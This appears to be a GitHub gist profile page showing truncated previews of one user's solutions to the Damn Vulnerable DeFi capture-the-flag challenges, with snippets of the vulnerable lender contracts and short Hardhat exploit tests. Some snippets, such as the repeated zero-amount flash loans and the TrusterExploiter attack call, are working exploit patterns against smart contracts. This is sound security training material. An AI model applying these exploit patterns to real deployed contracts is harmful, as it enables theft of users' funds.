Aditya Dixit az0mb13
👨💻
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| interface IFlashLoanEtherReceiver { | |
| function execute() external payable; | |
| } | |
| /** |
az0mb13
/ dvd3_ans2.js
Created
January 22, 2023 17:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| /** CODE YOUR EXPLOIT HERE */ | |
| const TrusterExploiter = await ethers.getContractFactory("TrusterExploiter", attacker); | |
| this.exploit = await TrusterExploiter.deploy(this.pool.address, this.token.address); | |
| await this.exploit.connect(attacker).attack(); | |
| console.log("Updated pool balance is: ", await this.token.balanceOf(this.pool.address)); | |
| }); |
az0mb13
/ dvd3_ans1.sol
Created
January 22, 2023 17:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract TrusterExploiter { | |
| TrusterLenderPool public immutable pool; | |
| IERC20 public immutable token; | |
| constructor(address _pool, address _token) { | |
| pool = TrusterLenderPool(_pool); | |
| token = IERC20(_token); | |
| } | |
| function attack() external { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| /** | |
| * @title TrusterLenderPool |
az0mb13
/ dvd2_1sol.js
Last active
January 21, 2023 16:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| this.pool.connect(attacker); | |
| for (i = 1; i <= 10; i ++) { | |
| this.pool.flashLoan(this.receiver.address, 0) | |
| } | |
| console.log(await ethers.provider.getBalance(this.receiver.address)) | |
| }); |
az0mb13
/ dvd2_2sol.js
Created
January 21, 2023 16:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) |
az0mb13
/ dvd2_2.sol
Last active
January 21, 2023 15:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract FlashLoanReceiver { | |
| ... | |
| function receiveEther(uint256 fee) public payable { | |
| require(msg.sender == pool, "Sender must be pool"); | |
| uint256 amountToBeRepaid = msg.value + fee; | |
| require(address(this).balance >= amountToBeRepaid, "Cannot borrow that much"); |
az0mb13
/ dvd2_1.sol
Last active
January 21, 2023 15:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| contract NaiveReceiverLenderPool is ReentrancyGuard { | |
| using Address for address; | |
| uint256 private constant FIXED_FEE = 1 ether; // not the cheapest flash loan |
az0mb13
/ dvd1_sol.js
Created
January 7, 2023 13:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| await this.token.connect(attacker).transfer(this.pool.address, 1); | |
| }); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract UnstoppableLender is ReentrancyGuard { | |
| ... | |
| function depositTokens(uint256 amount) external nonReentrant { | |
| require(amount > 0, "Must deposit at least one token"); | |
| // Transfer token from sender. Sender must have first approved them. | |
| damnValuableToken.transferFrom(msg.sender, address(this), amount); | |
| poolBalance = poolBalance + amount; | |
| } |